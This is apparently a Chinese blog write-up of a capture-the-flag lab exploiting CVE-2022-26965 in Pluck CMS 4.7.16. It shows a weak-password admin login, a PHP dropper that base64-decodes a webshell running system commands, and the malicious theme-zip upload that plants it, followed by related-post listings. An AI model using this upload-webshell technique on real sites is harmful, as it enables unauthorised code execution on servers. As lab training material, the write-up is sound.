[春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE

已于 2023-08-23 23:26:12 修改
阅读量458 收藏 2
点赞数 1
文章标签: 安全
于 2023-08-23 23:23:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52848454/article/details/132462253
版权

靶标介绍

Pluck-CMS-Pluck-4.7.16 后台RCE

靶场截图

靶场过关

1、点击url进入首页,点击admin进入后台登录页面

 2、弱口令admin登录,进入 后台管理页面

 3、去github上搜索Pluck CMS,下载压缩包解压

将构造的一句话木马写入info.php中

file_put_contents() 函数:把一个字符串写入文件中。

base64_decode()对encoded_data进行解码,返回原始数据。

PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTtwaHBpbmZvKCk7Pz4<?php system('cat /flag');phpinfo();?>base64编码

<?php file_put_contents('haha.php',base64_decode('PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTtwaHBpbmZvKCk7Pz4='));?>

4、将改好的文件压缩为zip,去安装主题处上传

 

 

 5、访问haha.php获取flag

b1n-7998
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pluck PHP多国语言简洁CMS系统 v4.7.4.rar
07-10
pluck PHP多国语言简洁CMS系统来自国外的PHP开源达人编写,系统小巧,可实现在页面里插入照片,在blog里写文章,用album-option分享照片,通过页面上的email表单和访客保持联系,更改站点信息等功能。   本次更新版本:pluck v4.7.4
春秋云境:CVE-2022-26965后台RCE
m0_65712192的博客
04-21 1583
Pluck-CMS-Pluck-4.7.16 后台RCE
春秋云境CVE-2022-26965
2303_76653367的博客
05-14 288
Pluck-CMS-Pluck-4.7.16 后台RCE
CVE-2022-26965
龙狼刺的博客
06-18 412
Pluck-CMS-Pluck-4.7.16 后台RCE
春秋云境:CVE-2022-26965
一只爱吃橙子的羊
11-29 2546
Pluck-CMS-Pluck-4.7.16 后台RCE
Pluck 代码问题漏洞( CVE-2022-26965)
千寻的博客
12-01 1941
Pluck-CMS-Pluck-4.7.16 后台RCE
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
Pluck CMS 中文版
03-26
Pluck是一个非常简单易用的PHP平台CMS(内容管理系统)。通过Pluck,即使不了解网络编程语言也可以建立自己的站点。 Pluck致力于让每个人都可以容易地管理自己的站点。对于所有的小型站点来说,Pluck是个不错的选择。Pluck发布于GPL协议下,是一个完全开源的平台。 cnPluck是一个致力于在中文领域推广PluckCMS的站点 使用PluckCMS建立您的站点需要PHP5+运行环境,以及不小于5MB的站点空间(安装PluckCMS大约需要占用3MB空间)。 您不需要SQL数据库,PluckCMS使用半静态的.php文件存储数据
春秋云镜 CVE-2022-26965
qq_22002773的博客
06-29 390
春秋云镜 CVE-2022-26965
利用cms主题构造木马(CVE-2022-26965)
热门推荐
Battery的博客
09-18 10万+
CVE-2022-26965Pluck CMS 4.7.16版本存在一个1。攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。
Pluck-CMS-Pluck-4.7.16 远程代码执行漏洞(CVE-2022-26965
最新发布
Flag少侠的博客
07-04 1万+
打开靶场来到首页,点击 admin 登录默认密码是 admin登录成功后页面如下点击选择主题(图片试了下不行)左边点击下载主题可以看到这里要咱上传文件下载一个轻量主题包链接先编码一下木马,再通过 PHP 生成一个一句话木马文件是一个用于将数据写入文件的 PHP 函数。它的基本用法是将一个字符串写入指定的文件中,如果文件不存在则创建它。这个函数具有以下语法:$filename是要写入数据的目标文件名。$data是要写入的数据,可以是字符串、数组或者通过fopen返回的文件指针。
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值